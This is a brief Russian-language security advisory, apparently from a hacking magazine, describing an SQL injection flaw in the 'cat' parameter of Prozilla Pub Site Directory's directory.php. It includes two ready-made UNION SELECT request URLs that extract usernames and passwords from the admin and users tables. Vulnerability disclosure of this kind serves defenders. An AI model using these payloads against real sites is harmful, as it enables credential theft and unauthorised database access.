Хакер #305. Многошаговые SQL-инъекции
Программа: Prozilla Pub Site Directory
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat» сценарием directory.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://server.com/Script_Dir/directory.php?cat=-1/* */UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7, concat(username,0x3a,password),9,10,11,12,13,14/* */FROM/**/admin/*
http://server.com/Script_Dir/directory.php?cat=-1/* */UNION/**/ALL%20SELECT/* */1,2,3,4,5,6,7,concat(username, 0x3a,password),9,10,11,12,13,14/* */FROM/**/users/*